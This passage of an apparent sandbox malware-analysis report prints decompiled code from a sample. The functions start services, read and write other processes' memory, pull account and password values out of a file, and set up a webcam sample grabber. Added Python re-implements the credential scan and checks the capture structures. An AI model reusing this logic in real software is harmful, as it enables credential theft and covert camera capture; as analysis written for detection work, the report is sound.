                                  						if(StartServiceW(_t13, 0, 0) != 0) {
                                  							L6:
                                  							_t15 = 1;
                                  							L7:
                                  							CloseServiceHandle(_t17);
                                  							CloseServiceHandle(_t13);
                                  							_t8 = _t15;
                                  							L8:
                                  							return _t8;
                                  						}
                                  						if(GetLastError() != 0x420) {
                                  							goto L7;
                                  						}
                                  						Sleep(0x7d0);
                                  						if(StartServiceW(_t13, 0, 0) == 0) {
                                  							goto L7;
                                  						}
                                  						goto L6;
                                  					}
                                  					CloseServiceHandle(_t17);
                                  					_t8 = 0;
                                  					goto L8;
                                  				}
                                  				return _t2;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D3B7
                                  • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040D3CC
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D3D9
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D3E6
                                  • GetLastError.KERNEL32 ref: 0040D3F0
                                  • Sleep.KERNEL32(000007D0), ref: 0040D402
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D40B
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D41F
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D422
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                  • String ID: ServicesActive
                                  • API String ID: 104619213-3071072050
                                  • Opcode ID: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                  • Instruction ID: 984c0b14d8c5f8436b4892bcd3ae393994a7e81e733ff7ebf7d643affbd23cba
                                  • Opcode Fuzzy Hash: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                  • Instruction Fuzzy Hash: 87014F35B083657BD6211BB6AC8CE9B3E7DDBC9B51B014076FA05E2290CA78980586B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                  • CoInitialize.OLE32(00000000), ref: 00410D4B
                                  • CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?), ref: 00410D69
                                  • VariantInit.OLEAUT32(?), ref: 00410DED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize$CreateInitInstanceSecurityVariant
                                  • String ID: G.@$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                  • API String ID: 2382742315-1265846757
                                  • Opcode ID: 6216df57731d72d57e541994fb23270ea6e499dffcfc2a0be6aacaaebdd8d353
                                  • Instruction ID: 842cc41d95007274ba15a25a83f44bddffeff0cfe444bad9149d26d573bd0b7d
                                  • Opcode Fuzzy Hash: 6216df57731d72d57e541994fb23270ea6e499dffcfc2a0be6aacaaebdd8d353
                                  • Instruction Fuzzy Hash: B141FB70A00209BFCB10DB96CC48EDFBBBDEFC9B14B104459F515EB290D6B5A981CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040EE24(long* __ecx, void** __edx, long _a4) {
                                  				long _v8;
                                  				intOrPtr _v12;
                                  				LONG* _v16;
                                  				void* _t30;
                                  				void _t32;
                                  				void* _t35;
                                  				int _t37;
                                  				void* _t44;
                                  				void* _t46;
                                  				void* _t52;
                                  				long _t62;
                                  				void* _t63;
                                  				struct _OVERLAPPED* _t74;
                                  
                                  				_t60 = __ecx;
                                  				_v12 = 0x426970;
                                  				_t74 = 0;
                                  				_v16 = 0;
                                  				_t62 = __ecx[1];
                                  				_t72 = __edx;
                                  				_t30 =  *_t62;
                                  				if(_t30 == 0) {
                                  					_t63 = __edx[1];
                                  					_t32 =  *_t63;
                                  					if(_t32 == 0) {
                                  						E0040102C( *__ecx,  *__edx, _a4);
                                  						_t74 = 1;
                                  						L22:
                                  						return _t74;
                                  					}
                                  					_t35 = _t32 - 1;
                                  					if(_t35 == 0) {
                                  						_t37 = ReadProcessMemory( *( *(_t63 + 4)),  *__edx,  *__ecx, _a4, 0);
                                  						L8:
                                  						_t74 = _t37;
                                  						goto L22;
                                  					}
                                  					if(_t35 != 5 || SetFilePointer( *( *(_t63 + 4)),  *__edx, 0, 0) == 0xffffffff) {
                                  						goto L22;
                                  					} else {
                                  						_t37 = ReadFile( *( *(_t72[1] + 4)),  *_t60, _a4,  &_v8, 0);
                                  						goto L8;
                                  					}
                                  				}
                                  				_t44 = _t30 - 1;
                                  				if(_t44 == 0) {
                                  					if( *(__edx[1]) != 0) {
                                  						L11:
                                  						_t46 = LocalAlloc(0x40, _a4);
                                  						_v16 = _t46;
                                  						if(_t46 != 0) {
                                  							if(E0040EE24( &_v16, _t72, _a4) != 0) {
                                  								_t74 = E0040EE24(_t60,  &_v16, _a4);
                                  							}
                                  							LocalFree(_v16);
                                  						}
                                  						goto L22;
                                  					}
                                  					_t37 = WriteProcessMemory( *( *(_t62 + 4)),  *__ecx,  *__edx, _a4, 0);
                                  					goto L8;
                                  				}
                                  				_t52 = _t44;
                                  				if(_t52 == 0) {
                                  					goto L11;
                                  				}
                                  				if(_t52 != 3) {
                                  					goto L22;
                                  				}
                                  				if( *(__edx[1]) != 0) {
                                  					goto L11;
                                  				}
                                  				if( *__ecx == 0 || SetFilePointer( *( *(_t62 + 4)),  *__ecx, 0, 0) != 0) {
                                  					_t37 = WriteFile( *( *(_t60[1] + 4)),  *_t72, _a4,  &_v8, _t74);
                                  					goto L8;
                                  				} else {
                                  					goto L22;
                                  				}
                                  			}

                                  APIs
                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                  • WriteFile.KERNEL32(?,`@,00426970,00000150,00000000), ref: 0040EE92
                                  • WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                  • LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                  • LocalFree.KERNEL32(?), ref: 0040EEF6
                                  • SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                  • ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                  • ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$LocalMemoryPointerProcessReadWrite$AllocFree
                                  • String ID: `@
                                  • API String ID: 3276737649-951712118
                                  • Opcode ID: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                  • Instruction ID: e72bb7fa78d81cf8525c6baf04ae928c9dbf0452580219fbc960ee642851fe31
                                  • Opcode Fuzzy Hash: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                  • Instruction Fuzzy Hash: B5415B35100016FFCB128FAACD8489ABFB5FF0A35071485A2F509EA2B0D736D920DF89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E00409244(intOrPtr __ecx, CHAR* _a4) {
                                  				char _v12;
                                  				long _v16;
                                  				void* _v20;
                                  				long _v24;
                                  				intOrPtr _v28;
                                  				void* _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _t96;
                                  				void* _t102;
                                  				char _t104;
                                  				void* _t125;
                                  				intOrPtr _t127;
                                  				char _t128;
                                  				long _t133;
                                  				void* _t135;
                                  				intOrPtr _t136;
                                  				void* _t141;
                                  				void* _t146;
                                  				void* _t147;
                                  				intOrPtr* _t165;
                                  				intOrPtr* _t167;
                                  				void* _t168;
                                  				void* _t169;
                                  				void* _t170;
                                  				void* _t172;
                                  				intOrPtr* _t173;
                                  				void* _t174;
                                  				intOrPtr _t175;
                                  				intOrPtr* _t177;
                                  				CHAR* _t178;
                                  				void* _t179;
                                  				void* _t180;
                                  
                                  				_v36 = __ecx;
                                  				_t174 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
                                  				if(_t174 != 0xffffffff) {
                                  					_t133 = GetFileSize(_t174, 0);
                                  					_v16 = _t133;
                                  					_t172 = E00401085(_t133);
                                  					_v32 = _t172;
                                  					E00401052(_t172, 0, _t133);
                                  					_v24 = _v24 & 0x00000000;
                                  					_t180 = _t179 + 0x10;
                                  					ReadFile(_t174, _t172, _t133,  &_v24, 0);
                                  					CloseHandle(_t174);
                                  					_t175 = E00405FFA(0x400000);
                                  					_v28 = _t175;
                                  					_a4 = E00405FFA(0x104);
                                  					_t96 = E00405FFA(0x104);
                                  					_t141 = 0;
                                  					_v12 = _t96;
                                  					_t135 = 0;
                                  					__eflags = _v16;
                                  					if(_v16 <= 0) {
                                  						L36:
                                  						E00405FEB(_a4);
                                  						E00405FEB(_v12);
                                  						E00405FEB(_t175);
                                  						return E00401099(_t172);
                                  					} else {
                                  						goto L3;
                                  					}
                                  					do {
                                  						L3:
                                  						_t167 =  *((intOrPtr*)(_t135 + _t172));
                                  						_t13 = _t167 - 0x21; // -33
                                  						__eflags = _t13 - 0x5d;
                                  						if(_t13 > 0x5d) {
                                  							goto L28;
                                  						}
                                  						__eflags = _t167 - 0x3d;
                                  						if(_t167 == 0x3d) {
                                  							goto L28;
                                  						}
                                  						 *((char*)(_t141 + _t175)) = _t167;
                                  						_t141 = _t141 + 1;
                                  						__eflags = _t167;
                                  						if(_t167 != 0) {
                                  							__eflags =  *((char*)(_t141 + _t175 - 8)) - 0x50;
                                  							if( *((char*)(_t141 + _t175 - 8)) != 0x50) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x61;
                                  							if( *((char*)(_t141 + _t175 - 7)) != 0x61) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x73;
                                  							if( *((char*)(_t141 + _t175 - 6)) != 0x73) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x73;
                                  							if( *((char*)(_t141 + _t175 - 5)) != 0x73) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x77;
                                  							if( *((char*)(_t141 + _t175 - 4)) != 0x77) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x6f;
                                  							if( *((char*)(_t141 + _t175 - 3)) != 0x6f) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x72;
                                  							if( *((char*)(_t141 + _t175 - 2)) != 0x72) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x64;
                                  							if( *((char*)(_t141 + _t175 - 1)) == 0x64) {
                                  								__eflags =  *_t172 - 0xd0;
                                  								_t102 = 2;
                                  								_t146 = 9;
                                  								_t103 =  !=  ? _t146 : _t102;
                                  								_t168 = 0;
                                  								_t147 = ( !=  ? _t146 : _t102) + _t135;
                                  								_t104 =  *((intOrPtr*)(_t147 + _t172));
                                  								__eflags = _t104 - 0x20;
                                  								if(_t104 <= 0x20) {
                                  									L35:
                                  									_t60 =  &_v12; // 0x50
                                  									__eflags = 0;
                                  									_v52 = 0;
                                  									_v48 = 0;
                                  									_v44 = 0;
                                  									 *((char*)(_t168 +  *_t60)) = 0;
                                  									E004034D1( &_v20,  *_t60);
                                  									_t66 =  &_a4; // 0x50
                                  									E004034D1( &_v16,  *_t66);
                                  									E00403549( &_v44, E004031AF( &_v20, __eflags,  &_v32));
                                  									E00405FEB(_v32);
                                  									E00403549( &_v48, E004031AF( &_v16, __eflags,  &_v32));
                                  									E00405FEB(_v32);
                                  									_v40 = 5;
                                  									E00403549( &_v52, E004036F7( &_v32, 0x417668));
                                  									E00405FEB(_v32);
                                  									E00401FF2(_t180 - 0x10,  &_v52);
                                  									E00402028(_v36);
                                  									E00405FEB(_v16);
                                  									E00405FEB(_v20);
                                  									E00401441( &_v52);
                                  									goto L36;
                                  								}
                                  								_t58 =  &_v12; // 0x50
                                  								_t136 =  *_t58;
                                  								_t165 = _t147 + _t172;
                                  								__eflags = _t165;
                                  								while(1) {
                                  									__eflags = _t104 - 0x7f;
                                  									if(_t104 >= 0x7f) {
                                  										goto L35;
                                  									}
                                  									__eflags = _t104 - 0x21;
                                  									if(_t104 == 0x21) {
                                  										goto L35;
                                  									}
                                  									 *((char*)(_t168 + _t136)) = _t104;
                                  									_t168 = _t168 + 1;
                                  									_t165 = _t165 + 1;
                                  									_t104 =  *_t165;
                                  									__eflags = _t104 - 0x20;
                                  									if(_t104 > 0x20) {
                                  										continue;
                                  									}
                                  									goto L35;
                                  								}
                                  								goto L35;
                                  							}
                                  							goto L28;
                                  						}
                                  						__eflags = _t141 - 7;
                                  						if(_t141 <= 7) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x41;
                                  						if( *((char*)(_t141 + _t175 - 7)) != 0x41) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x63;
                                  						if( *((char*)(_t141 + _t175 - 6)) != 0x63) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x63;
                                  						if( *((char*)(_t141 + _t175 - 5)) != 0x63) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x6f;
                                  						if( *((char*)(_t141 + _t175 - 4)) != 0x6f) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x75;
                                  						if( *((char*)(_t141 + _t175 - 3)) != 0x75) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x6e;
                                  						if( *((char*)(_t141 + _t175 - 2)) != 0x6e) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x74;
                                  						if( *((char*)(_t141 + _t175 - 1)) != 0x74) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *_t172 - 0xd0;
                                  						_t125 = 2;
                                  						_t169 = 9;
                                  						_t126 =  !=  ? _t169 : _t125;
                                  						_t170 = 0;
                                  						_t127 = ( !=  ? _t169 : _t125) + _t135;
                                  						_v20 = _t127;
                                  						_t128 =  *((intOrPtr*)(_t127 + _t172));
                                  						__eflags = _t128 - 0x20;
                                  						if(_t128 <= 0x20) {
                                  							L19:
                                  							 *((char*)(_t170 + _a4)) = 0;
                                  							goto L28;
                                  						}
                                  						_t177 = _v20 + _t172;
                                  						__eflags = _t177;
                                  						_v20 = _t177;
                                  						_t173 = _t177;
                                  						_t178 = _a4;
                                  						while(1) {
                                  							__eflags = _t128 - 0x7f;
                                  							if(_t128 >= 0x7f) {
                                  								break;
                                  							}
                                  							_t173 = _t173 + 1;
                                  							 *((char*)(_t170 + _t178)) = _t128;
                                  							_t170 = _t170 + 1;
                                  							_t128 =  *_t173;
                                  							__eflags = _t128 - 0x20;
                                  							if(_t128 > 0x20) {
                                  								continue;
                                  							}
                                  							break;
                                  						}
                                  						_t175 = _v28;
                                  						_t172 = _v32;
                                  						goto L19;
                                  						L28:
                                  						_t135 = _t135 + 1;
                                  						__eflags = _t135 - _v16;
                                  					} while (_t135 < _v16);
                                  					goto L36;
                                  				}
                                  				GetLastError();
                                  				return CloseHandle(_t174);
                                  			}
                                  [decompiler address column for this function, 0x0040924f to 0x004094ec, not reproduced line by line]

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                  • GetLastError.KERNEL32 ref: 0040926E
                                  • CloseHandle.KERNEL32(00000000), ref: 00409275
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409282
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004092B1
                                  • CloseHandle.KERNEL32(00000000), ref: 004092B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateErrorLastReadSize
                                  • String ID: Password$Password
                                  • API String ID: 1366138817-7788977
                                  • Opcode ID: 03cb85b73b3a8ba81eb47b896a70f04b67c39f35aea174c06fd08411b80ec136
                                  • Instruction ID: 0d079fec5c7f131bda1ced3cf5849022ba7cb4fed2040c8ba0bcc6ec81886411
                                  • Opcode Fuzzy Hash: 03cb85b73b3a8ba81eb47b896a70f04b67c39f35aea174c06fd08411b80ec136
                                  • Instruction Fuzzy Hash: 3F81F270C08246AEEB259B65C891BEE7B74AF09318F54817FE441BA2C3C77D5D828B19
                                  Uniqueness

                                  Uniqueness Score: -1.00%
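What the fragment above actually harvests is easier to see as a small executable model than in the decompiler output. The routine opens and reads a file (CreateFileA/GetFileSize/ReadFile), walks the buffer, and where the seven bytes before the cursor are 0x41 0x63 0x63 0x6f 0x75 0x6e 0x74 ("Account") it skips 2 bytes if the file's first byte is 0xd0 and 9 bytes otherwise, then copies printable bytes into the caller's buffer (_a4); where a token ending in 0x64 ('d') is hit it does the same into its own buffer (_v12), stopping additionally at 0x21, and emits a record built from both strings. The model below is an added example, not code from the report or from the sample. Three things are assumptions the report does not make: that the register pairs _t141/_t135 and _t175/_t172 are the same cursor and buffer (the decompiler re-loads them from _v28/_v32), that the 'd' branch was preceded, outside the fragment, by checks for "Passwor" (the function's String ID is "Password"), and that the caller's account buffer starts out empty. The sample inputs are constructed for the example.

```python
"""Executable model of the token scan in the decompiled credential routine.

Added example; not code from the report or the sample. Reproduces only what
the fragment shows, plus the assumptions stated in the lead-in.
"""

ACCOUNT = b"Account"    # bytes 0x41 0x63 0x63 0x6f 0x75 0x6e 0x74 compared at buf[i-7:i]
PASSWORD = b"Password"  # only the trailing 0x64 compare is in the fragment (assumption)


def _value_after(buf: bytes, i: int, stop_at_bang: bool) -> str:
    """Copy the value following a token whose last byte is buf[i-1].

    The routine skips 2 bytes when the file's first byte is 0xd0 and 9
    otherwise, then copies while 0x20 < b < 0x7f. The password branch also
    stops at 0x21 ('!'). Unlike the original loop, this one bounds-checks.
    """
    pos = i + (2 if buf[0] == 0xD0 else 9)
    out = bytearray()
    while pos < len(buf):
        b = buf[pos]
        if b <= 0x20 or b >= 0x7F or (stop_at_bang and b == 0x21):
            break
        out.append(b)
        pos += 1
    return out.decode("ascii")


def scan_credentials(buf: bytes) -> list:
    """Return (account, password) records in the order the routine emits them.

    "Account" only refreshes the caller's buffer (_a4); a record is emitted
    when a later "Password" token is found and paired with that buffer.
    """
    records = []
    account = ""  # assumed initial content of the caller's buffer
    for i in range(len(buf)):
        if i > 7 and buf[i - 7:i] == ACCOUNT:
            account = _value_after(buf, i, stop_at_bang=False)
        elif i > 8 and buf[i - 8:i] == PASSWORD:
            records.append((account, _value_after(buf, i, stop_at_bang=True)))
    return records


# Constructed inputs for illustration; not taken from the sample or any real file.
SAMPLE_D0 = b"\xd0\x00Account: user@example.test\r\nPassword: s3cret!x\r\n"
SAMPLE_OTHER = (b"X" + b"Account" + b"\x00" * 9 + b"bob@example.test\n"
                + b"Password" + b"\x00" * 9 + b"pw\n")

if __name__ == "__main__":
    for name, sample in (("first byte 0xd0", SAMPLE_D0), ("other header", SAMPLE_OTHER)):
        print(name, scan_credentials(sample))
```

Two details of the original survive in the model and are worth knowing when you write a detection or a parser for the same data: the 0xd0 first-byte switch selects the 2- versus 9-byte skip (two file layouts), and a '!' in a password truncates it ("s3cret!x" becomes "s3cret"), which means the stolen value is not always the real one.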

                                  C-Code - Quality: 61%
                                  			E004146E1(intOrPtr __ecx, intOrPtr _a4) {
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v58;
                                  				intOrPtr _v64;
                                  				intOrPtr _v68;
                                  				void* _v128;
                                  				char _v144;
                                  				intOrPtr _v148;
                                  				char _v216;
                                  				intOrPtr* _t63;
                                  				intOrPtr* _t76;
                                  				intOrPtr* _t80;
                                  				intOrPtr* _t82;
                                  				intOrPtr* _t89;
                                  				intOrPtr* _t91;
                                  				intOrPtr* _t92;
                                  				intOrPtr* _t93;
                                  				intOrPtr* _t94;
                                  				intOrPtr* _t95;
                                  				intOrPtr* _t96;
                                  				intOrPtr* _t98;
                                  				signed int _t103;
                                  				intOrPtr* _t115;
                                  				intOrPtr* _t118;
                                  				void* _t121;
                                  
                                  				_v28 = __ecx;
                                  				__imp__CoInitialize(0);
                                  				_t2 =  &_v24; // 0x414222
                                  				_v12 = 0;
                                  				_v16 = 0;
                                  				_t118 = 0;
                                  				_v20 = 0;
                                  				_t89 = 0;
                                  				_v24 = 0;
                                  				_t115 = __imp__CoCreateInstance;
                                  				_t63 =  *_t115(0x4175c0, 0, 1, 0x41a79c, _t2);
                                  				_t7 =  &_v24; // 0x414222
                                  				_t91 =  *_t7;
                                  				if(_t91 == 0) {
                                  					L8:
                                  					_t92 = _v12;
                                  					if(_t92 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
                                  						_v12 = _v12 & 0x00000000;
                                  					}
                                  					L10:
                                  					_t93 = _v16;
                                  					if(_t93 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
                                  						_v16 = _v16 & 0x00000000;
                                  					}
                                  					_t94 = _v20;
                                  					if(_t94 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
                                  						_v20 = _v20 & 0x00000000;
                                  					}
                                  					_t56 =  &_v24; // 0x414222
                                  					_t95 =  *_t56;
                                  					if(_t95 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
                                  						_v24 = _v24 & 0x00000000;
                                  					}
                                  					if(_t118 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
                                  					}
                                  					if(_t89 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
                                  					}
                                  					__imp__CoUninitialize();
                                  					return _t63;
                                  				}
                                  				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x4175a0,  &_v16);
                                  				_t96 = _v16;
                                  				if(_t96 == 0) {
                                  					goto L8;
                                  				}
                                  				 *((intOrPtr*)( *_t96 + 4))(_t96);
                                  				_t63 = E00414A12(_a4,  &_v12);
                                  				if(_v12 == 0) {
                                  					goto L10;
                                  				}
                                  				_t63 =  *_t115(0x417610, 0, 1, 0x41a78c,  &_v20);
                                  				_t98 = _v20;
                                  				if(_t98 != 0) {
                                  					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
                                  					_t76 = _v20;
                                  					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
                                  					E00401052( &_v144, 0, 0x48);
                                  					_t22 =  &_v24; // 0x414222
                                  					_t80 =  *_t22;
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
                                  					_t63 = E0041462F();
                                  					_t118 = _t63;
                                  					if(_t118 != 0) {
                                  						_t63 = E0041464B();
                                  						_t89 = _t63;
                                  						if(_t89 != 0) {
                                  							_t103 = _v20;
                                  							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
                                  							if(_t63 >= 0) {
                                  								_t31 =  &_v24; // 0x414222
                                  								_t82 =  *_t31;
                                  								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
                                  								_t105 = _v148;
                                  								_t113 = _v148 + 0x30;
                                  								E0040102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
                                  								E00414492( &_v216);
                                  								_t63 = E00414AD1(_v28, _t113, _a4, _v64, _v68, _v58);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				goto L8;
                                  			}
                                  [decompiler address column for this function, 0x004146ef to 0x004148b3, not reproduced line by line]

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004146F3
                                  • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,"BA), ref: 00414720
                                  • CoUninitialize.OLE32 ref: 004148A9
                                    • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 00414A40
                                  • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414771
                                    • Part of subcall function 00414492: CoTaskMemFree.OLE32(?), ref: 004144A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                  • String ID: "BA$Grabber$Source$vids
                                  • API String ID: 533512943-1720631296
                                  • Opcode ID: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                  • Instruction ID: 2c6567443aae3fa2ccd83cd9410249409bd9c9e0b512ace47bdcaa6ee1176714
                                  • Opcode Fuzzy Hash: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                  • Instruction Fuzzy Hash: D7517F75A00209AFDB14EFA5C888EEEB7B9FF84305F14846EF915AB250C7759D40CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%
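The report leaves the CLSID/IID pointers in E004146E1 (0x4175c0, 0x41a79c, 0x4175a0, 0x417610) unresolved, so reading the routine as a DirectShow filter graph that connects a video capture source to a sample grabber is an interpretation, not something the page states. The evidence for it is all in the fragment: a 0x48-byte structure is zeroed and two GUIDs (32 bytes of movsd) copied into it before a vtable slot-4 call; two filters are added to a graph by name (L"Source", L"Grabber") through vtable slot 3, which is where IFilterGraph::AddFilter(IBaseFilter*, LPCWSTR) sits; a connected media type is fetched, 0x28 bytes are copied from pbFormat + 0x30, and the block is released through a subcall that ends in CoTaskMemFree; and the String ID contains "vids". The check below, an added example rather than the sample's or the report's code, confirms that the three hard-coded sizes equal sizeof(AM_MEDIA_TYPE), the offset of bmiHeader inside VIDEOINFOHEADER and sizeof(BITMAPINFOHEADER) in the public 32-bit layouts, and that "vids" is the little-endian Data1 of MEDIATYPE_Video. The VIDEOINFOHEADER it parses is constructed for the example.

```python
import struct
import uuid

# 32-bit little-endian layouts from the public DirectShow/GDI headers
# (strmif.h, amvideo.h, wingdi.h). Added example; not the sample's code.
AM_MEDIA_TYPE_FMT = "<16s16sIIi16sIII"   # majortype, subtype, bFixedSizeSamples,
                                         # bTemporalCompression, lSampleSize,
                                         # formattype, pUnk, cbFormat, pbFormat
VIDEOINFOHEADER_PREFIX_FMT = "<4i4iIIq"  # rcSource, rcTarget, dwBitRate,
                                         # dwBitErrorRate, AvgTimePerFrame
BITMAPINFOHEADER_FMT = "<IiiHHIIiiII"    # biSize, biWidth, biHeight, biPlanes,
                                         # biBitCount, biCompression, biSizeImage,
                                         # biXPelsPerMeter, biYPelsPerMeter,
                                         # biClrUsed, biClrImportant

# MEDIATYPE_Video; Data1 stored little-endian reads as the FOURCC "vids".
MEDIATYPE_VIDEO = uuid.UUID("73646976-0000-0010-8000-00AA00389B71")


def layout_sizes() -> dict:
    """The three constants the decompiled routine hard-codes."""
    return {
        "AM_MEDIA_TYPE": struct.calcsize(AM_MEDIA_TYPE_FMT),               # 0x48, memset length
        "bmiHeader_offset": struct.calcsize(VIDEOINFOHEADER_PREFIX_FMT),  # 0x30, added to pbFormat
        "BITMAPINFOHEADER": struct.calcsize(BITMAPINFOHEADER_FMT),         # 0x28, copy length
    }


def mediatype_fourcc() -> bytes:
    """First four bytes of MEDIATYPE_Video as they sit in memory."""
    return MEDIATYPE_VIDEO.bytes_le[:4]


def make_videoinfo(width: int, height: int, bitcount: int) -> bytes:
    """Build a VIDEOINFOHEADER (constructed test data, not a captured one)."""
    prefix = struct.pack(VIDEOINFOHEADER_PREFIX_FMT,
                         0, 0, width, height,   # rcSource
                         0, 0, width, height,   # rcTarget
                         0, 0,                  # dwBitRate, dwBitErrorRate
                         333333)                # AvgTimePerFrame in 100 ns units (~30 fps)
    bmi = struct.pack(BITMAPINFOHEADER_FMT,
                      40, width, height, 1, bitcount,
                      0, width * height * bitcount // 8, 0, 0, 0, 0)
    return prefix + bmi


def bmi_from_videoinfo(pb_format: bytes) -> dict:
    """Mirror the routine's copy of 0x28 bytes from pbFormat + 0x30."""
    off = struct.calcsize(VIDEOINFOHEADER_PREFIX_FMT)
    end = off + struct.calcsize(BITMAPINFOHEADER_FMT)
    size, width, height, planes, bitcount, *_ = struct.unpack(BITMAPINFOHEADER_FMT,
                                                              pb_format[off:end])
    return {"biSize": size, "biWidth": width, "biHeight": height,
            "biPlanes": planes, "biBitCount": bitcount}


if __name__ == "__main__":
    print(layout_sizes(), mediatype_fourcc())
    print(bmi_from_videoinfo(make_videoinfo(640, 480, 24)))
```

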